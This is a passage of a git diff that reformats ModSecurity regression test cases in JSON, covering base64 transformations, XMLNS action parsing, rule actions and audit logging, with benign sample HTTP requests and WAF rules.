"port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log": "t:base64encode: \"dmFsdWUy\"" + "expected": { + "debug_log": "t:base64encode: \"dmFsdWUy\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:1,phase:2,t:base64encode,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Transformatio :: base64 (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Transformatio :: base64 (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=dmFsdWUy¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log": "t:base64decode: \"value2\"" + "expected": { + "debug_log": "t:base64decode: \"value2\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:1,phase:2,t:base64decode,pass,t:trim\"" ] diff --git a/test/test-cases/regression/action-xmlns.json b/test/test-cases/regression/action-xmlns.json index df612f20c3..f2c1f56c53 100644 --- a/test/test-cases/regression/action-xmlns.json +++ b/test/test-cases/regression/action-xmlns.json @@ -1,108 +1,195 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing action :: XMLNS (parser error 1)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing action :: XMLNS (parser error 1)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "XMLS: Bad format, missing equals sign" }, - "rules":[ + "rules": [ "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:123,xmlns:soap'http://schemas.xmlsoap.org/soap/envelope/'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing action :: XMLNS (parser error 2)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing action :: XMLNS (parser error 2)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "XMLS: XMLNS is invalid. Expecting a name=value format." }, - "rules":[ + "rules": [ "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:123,xmlns:=\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing action :: XMLNS (parser error 3)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing action :: XMLNS (parser error 3)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "XMLS: Missing xmlns href for prefix: `schemas.xmlsoap.org/soap/envelope/'." }, - "rules":[ + "rules": [ "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:123,xmlns:soap='schemas.xmlsoap.org/soap/envelope/'\"" ] }, - { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing XML request body parser (validate ok)", - "expected":{ - "debug_log": "Target value: \"39.95\" \\(Variable: XML:\/bookstore\/book\/price\\[text\\(\\)\\]\\)" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + { + "enabled": 1, + "version_min": 300000, + "title": "Testing XML request body parser (validate ok)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", "", "", - "Everyday Italian", - "Giada De Laurentiis", - "2005", - "30.00", + "Everyday Italian", + "Giada De Laurentiis", + "2005", + "30.00", "", - "", - "Harry Potter", - "J K. Rowling", - "2005", - "29.99", + "Harry Potter", + "J K. Rowling", + "2005", + "29.99", "", - "", - "XQuery Kick Start", - "James McGovern", - "Per Bothner", - "Kurt Cagle", - "James Linn", - "Vaidyanathan Nagarajan", - "2003", - "49.99", + "XQuery Kick Start", + "James McGovern", + "Per Bothner", + "Kurt Cagle", + "James Linn", + "Vaidyanathan Nagarajan", + "2003", + "49.99", "", - "", - "Learning XML", - "Erik T. Ray", - "2003", - "39.95", + "Learning XML", + "Erik T. Ray", + "2003", + "39.95", "", "" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Target value: \"39.95\" \\(Variable: XML:/bookstore/book/price\\[text\\(\\)\\]\\)", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] } ] diff --git a/test/test-cases/regression/actions.json b/test/test-cases/regression/actions.json index c69f1a7cb0..fe00e9a39c 100644 --- a/test/test-cases/regression/actions.json +++ b/test/test-cases/regression/actions.json @@ -15,8 +15,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -26,31 +26,31 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ @@ -59,7 +59,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,deny\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, @@ -75,8 +75,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -86,31 +86,31 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 302, "redirect_url": "http://www.google.com" }, @@ -119,7 +119,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,redirect:'http://www.google.com'\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, @@ -135,8 +135,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -146,31 +146,31 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 306, "redirect_url": "http://www.google.com" }, @@ -179,7 +179,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,status:306,redirect:'http://www.google.com'\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, @@ -195,8 +195,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -206,31 +206,31 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 500 }, "rules": [ @@ -238,7 +238,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,deny,status:500\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, @@ -254,8 +254,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -265,31 +265,31 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 500 }, "rules": [ @@ -313,8 +313,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -324,31 +324,31 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 500 }, "rules": [ diff --git a/test/test-cases/regression/auditlog.json b/test/test-cases/regression/auditlog.json index a04867ef49..eacaeeb5f8 100644 --- a/test/test-cases/regression/auditlog.json +++ b/test/test-cases/regression/auditlog.json @@ -15,8 +15,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,23 +25,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ @@ -72,8 +72,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -82,23 +82,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ @@ -130,8 +130,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -140,23 +140,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ @@ -188,8 +188,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -198,14 +198,16 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" @@ -213,8 +215,6 @@ }, "expected": { "audit_log": "{\"transaction\":{\"client_ip\":\"200.249.12.31\",\"time_stamp\":\"\\S{3} \\S{3} [ \\d]\\d \\d{2}:\\d{2}:\\d{2} \\d{4}\"", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ @@ -247,8 +247,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -257,14 +257,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1=test¶m2=test2", + "uri": "/test.pl?param1=test¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, "expected": { "audit_log": "id \"1556", - "error_log": "", "http_code": 403 }, "rules": [ @@ -296,8 +305,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -306,14 +315,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1=test¶m2=tEst2", + "uri": "/test.pl?param1=test¶m2=tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ @@ -345,8 +363,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -355,14 +373,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1=test¶m2=%20tEst2", + "uri": "/test.pl?param1=test¶m2=%20tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ @@ -394,8 +421,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -404,14 +431,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1=test¶m2=tEst2", + "uri": "/test.pl?param1=test¶m2=tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ @@ -444,8 +480,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 